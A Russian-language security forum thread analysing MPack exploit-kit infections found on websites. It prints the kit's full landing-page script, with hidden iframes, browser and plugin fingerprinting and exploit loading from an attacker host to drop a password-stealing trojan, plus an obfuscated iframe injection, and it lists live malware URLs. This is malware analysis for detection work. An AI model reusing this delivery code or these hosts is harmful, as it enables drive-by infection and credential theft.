mpack

[vaber 350]

Просматривая форум Касперского наткнулся на обращение пользователя в этой теме http://forum.kaspersky.com/index.php?showt...9084&st=320

пост номер 333

Если перейти по той ссылке и просмотреть исходный код страницы в самом низу можно увидеть:

<iframe src='http://www.alaqiq.net/quran/stata/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

При открытии страницы, что в iframe идет переадресация на alaqiq.net/quran/gstata/index.php

Выполняется следующий скрипт:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html xmlns:IE>    <head>        <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">        <IE:clientCaps ID="oClientCaps" /><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /quran/gstata/index.php was not found on this server.<P><P>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.<HR><ADDRESS>Apache/1.3.37 Server at www.alaqiq.net Port 80</ADDRESS></BODY></html>    <script>    function testBrowser()    {        if ( document.defaultCharset != '' && document.defaultCharset != undefined && document.characterSet == undefined && document.body)        {             productVersion=window.navigator.userAgent.substr(window.navigator.userAgent.indexOf("MSIE")+5,3);            var browser = "MSIE";        }                if (window.opera && document.defaultCharset == undefined &&  document.characterSet != "" &&  document.characterSet != undefined && self.innerHeight)        {             productVersion=window.navigator.userAgent.substr(window.navigator.userAgent.indexOf("Opera")+6,4);            var browser = "Opera";        }                if (document.defaultCharset == undefined && !window.opera  &&  document.characterSet != "" && (self.innerHeight))        {             productVersion=window.navigator.userAgent.substr(window.navigator.userAgent.indexOf("Gecko")+6,8)+ ' ('+ window.navigator.userAgent.substr(8,3) + ')';            var browser = "Firefox";        }                if (productVersion == "")        {            var browser = window.navigator.userAgent;        }        return browser;    }        function getVersion()    {        var osversion  = "";        var osplatform = "";        osversion  = navigator.appVersion;        osplatform = navigator.platform        if (osplatform.search("Win32") != -1)        {            if (osversion.indexOf('Windows 95') != -1)             return "95"            else if (osversion.indexOf('Windows NT 4') != -1)     return "NT"            else if (osversion.indexOf('Win 9x 4.9') != -1)     return "ME"            else if (osversion.indexOf('Windows 98') != -1)     return "98"            else if (osversion.indexOf('SV1') != -1)             return "SP2"            else if (osversion.indexOf('Windows NT 5.0') != -1) return "2K"            else if (osversion.indexOf('Windows NT 5.1') != -1) return "XP"            else if (osversion.indexOf('Windows NT 5.2') != -1) return "2K3"        }    }        function fGetVersion(CLSID)    {        if (oClientCaps.isComponentInstalled(CLSID,"ComponentID")) return 1;        else return 0;    }            function showexp(exploit,crypt)    {        window.status = '1';        document.getElementById('upiresult').innerHTML = "<iframe src='upack/eiframe.php?exploit="+iexploits[exploit]+"&crypt="+crypt+"&url=http://www.alaqiq.net/quran/gstata/index.php?file=1' style='width:0px; height:0px; border: 0px'></iframe>";        if (exploit != 5 )         {            exploit = exploit + 1;            setTimeout("showexp("+exploit+",0);",interval * 1000);        }    }        function showoexp(exploit,crypt)    {        if (isqt) document.getElementById('uporesult').innerHTML = "<iframe src='upack/eiframe.php?exploit="+oexploits[exploit]+"&crypt="+crypt+"&url=http://www.alaqiq.net/quran/gstata/index.php?file=1' width=20 height=20 frameborder=0 ></iframe>";        if (exploit == 0 && iswzip ) setTimeout("showoexp(1,0);",interval * 1000);        if (exploit == 1 && iswzip)         {            document.getElementById('uporesult').innerHTML = "<iframe src='upack/eiframe.php?exploit="+oexploits[exploit]+"&crypt="+crypt+"&url=http://www.alaqiq.net/quran/gstata/index.php?file=1' width=20 height=20 frameborder=0 ></iframe>";            if (isya) document.getElementById('uporesult').innerHTML = "<iframe src='upack/eiframe.php?exploit="+oexploits[3]+"&crypt="+crypt+"&url=http://www.alaqiq.net/quran/gstata/index.php?file=1' width=20 height=20 frameborder=0 ></iframe>";        }        }        function showfexp(exploit,crypt)    {        document.getElementById('upfresult').innerHTML = "<iframe src='upack/eiframe.php?exploit="+fexploits[exploit]+"&crypt="+crypt+"&url=http://www.alaqiq.net/quran/gstata/index.php?file=1' width=20 height=20 frameborder=0 ></iframe>";    }    function testwzip()    {        iswzip = 0;        try        {            var wzip = new ActiveXObject ('WZFILEVIEW.'+'FileViewCtrl.61');            iswzip = 1;        }        catch(e){};        return iswzip;    }        function testqt()    {        isqt = 0;        try        {            var qt = new ActiveXObject('QuickTime.QuickTime');            isqt = 1;        }        catch(e){};        return isqt;    }        function testya()    {        ya = 1;        try        {            document.writeln('<object classid="clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277" onerror='eval("ya  = 0;")'></object>');        }        catch(e){};        return ya;    }                    document.writeln('<div id="upiresult"></div>');    document.writeln('<div id="uporesult"></div>');    document.writeln('<div id="upfresult"></div>');                    var interval = 3;    var iswmp    = 0;    var iswzip   = testwzip();    var isqt       = testqt();    var isya     = testya();    var productVersion = "";    var exploit = 0;    var iexploits = new Array("mdac","adodb","setslice","vml","xml","danim");    var fexploits = new Array("wmplayer","firefox","firefox1");    var oexploits = new Array("qtime","winzip","w2k","yahoo");    var browser   = testBrowser();    var system    = getVersion();                if (browser != "MSIE")     {        numPlugins = navigator.plugins.length;        if (numPlugins > 0)        {            var plugs="";            var infplug ="";            for (i = 0; i< numPlugins; i++)            {                 plugin    = navigator.plugins[i];                if ( plugin.description.indexOf("Windows Media") != -1 ) { iswmp  = 1;     }            }        }    }            if ( iswzip || isqt || isya )    {        setTimeout("showoexp(0,0);",interval * 1000);    }        if (browser == "MSIE" && system == "2K") setTimeout("showoexp(2,0);",interval * 1000);        if (browser == "MSIE")    {        showexp(0,0);    }    else    {        showfexp(0,0);    }                                      </script>

В коде отчетливо видно - идет определение, с какого браузера зашел пользователь и в зависимости от этого идет побор эксплоитов конкретно под браузер.

Например при заходе с Firefox:fexploits = new Array("wmplayer","firefox","firefox1");Соответствено будет создаваться <iframe src='upack/eiframe.php?exploit="+fexploits[exploit]+"&crypt="+crypt+"&url=http://www.alaqiq.net/quran/gstata/index.php?file=1' width=20 height=20 frameborder=0 ></iframe>

Все эксплоиты скачаны и выложены в закрытой ветке форума.

Во всех случаях идет попытка загрузки криптованного пинча (Trojan-PSW.Win32.LdPinch.bgj по KL)

[ordon 0]

Пробовал зайти вручную - не получается, a iframe уже чист.

Зато по этой сссылке http://alexfinker.com/m/index.php я зашёл и увидел лишь :[

Скрипты были включены.

Наткнулся на список сайтов и ссылок с малварой, правда он не обновлялся давно...

[vaber 350]

Пробовал зайти вручную - не получается, a iframe уже чист.

Уже убрали. Но главное то, что сплоиты все у них я украл и они уже детектируются Касперским. Весь набор!! Они потеряют много денег

Зато по этой сссылке http://alexfinker.com/m/index.php я зашёл и увидел лишь :[ Laughing

Скрипты были включены.

Смайл обычно виден начиная со второго захода - после первого Ваш Ip был занесен в базу, а при втором заходе эксполит уже не идет.

Там кстати тоже mpack - загружается троян-загрузчик Trojan-Dropper.Win32.Tiny.r , который тянет еще 2-ух - Trojan-PSW.Win32.LdPinch.ceb и Email-Worm.Win32.Zhelatin.ch. Хотя если порыться на том сайте, откуда загрузчик тянет 2 троянов, можно найти еще одного - этого же желатина, только не пакованного.

Наткнулся на список сайтов и ссылок с малварой, правда он не обновлялся давно...

Спасибо, если хоть третья часть тех ссылок жива - можно будет накачать с десяток-другой малвар и поместить ссылки в базу (малвары-то обновляются )

[vaber 350]

Из темы:

http://www.securitylab.ru/news/300176.php

На сайте www.lancrypto.ru внизу страницы имеется iframe

<!-- o65 --><script type="text/javascript">document.write('u003cu0069u0066u0072u0061u006du0065u0020u0073u0072u0063u003du0022u0068u0074u0074u0070u003au002fu002fu0077u0077u0077u002eu0074u0072u0061u0066u0066u0064u0073u002eu006eu0065u0074u002fu0074u0064u0073u002fu0069u006eu0064u0065u0078u002eu0070u0068u0070u0022u0020u0077u0069u0064u0074u0068u003du0030u0020u0068u0065u0069u0067u0068u0074u003du0030u003eu003cu002fu0069u0066u0072u0061u006du0065u003e')</script><!-- c65 -->Что равно  <iframe src="http://www.traffds.net/tds/index.php" width=0 height=0></iframe>

Идет переадресация на miramax-invest.net/oops/index.php где собственно и зашифрованный эксплоит (детектируется как Trojan-Downloader.JS.Agent.kd)

Он в случае эксплуатации уязвимости загружает троянского-загрузчика (детектируется эмулятором седьмого Касперского как Heur.Trojan.Generic (модификация)). К сожалению на данный момент он уже ничего не загружает

[Артём 0]

На сайте www.lomalka.ru, если попытаться скачать любой кряк то автоматом получаешь загрузчика троянов. Интересно, какого троя он качает....??

[Lemmit 31]

На сайте www.lomalka.ru...

А че это вы там делали?

[Артём 0]

На сайте www.lomalka.ru...

А че это вы там делали?

Случано там оказался :oops: Всё же интересно какой там троян :roll:

[ordon 0]

Уже убрали . Но главное то, что сплоиты все у них я украл и они уже детектируются Касперским. Весь набор!! Они потеряют много денег

Поздравляю . Кстати вот интервью с одним из создателей MPack.

Судя по нему проект всё равно остаётся прибыльным несмотря ни на что, бренд так сказать

Смайл обычно виден начиная со второго захода - после первого Ваш Ip был занесен в базу, а при втором заходе эксполит уже не идет.

Некоторое время назад при посещении одного сайта на тему астрономии (не помню точно какого именно) на протяжении нескольких дней NOD веб-сканером постоянно выдавал сообщение о попытке загрузится модифицированного JS/Exploit.BO.NAA.Trojan.

Сейчас больше его нет,вручную если зайти на ссылку (http://all1count.net/), которая в логах - тоже ничего, только цифра 1

Спасибо, если хоть третья часть тех ссылок жива - можно будет накачать с десяток-другой малвар и поместить ссылки в базу (малвары-то обновляются )

Рад был помочь , надеюсь что-то выловится.

На сайте www.lomalka.ru

Чего там только нет, полный набор всего...

[Артём 0]

Чего там только нет, полный набор всего...

Пользуйтесь в своё удовольствие!

Ну всё же интересно кого загружает тот загрузчик троянов... :?: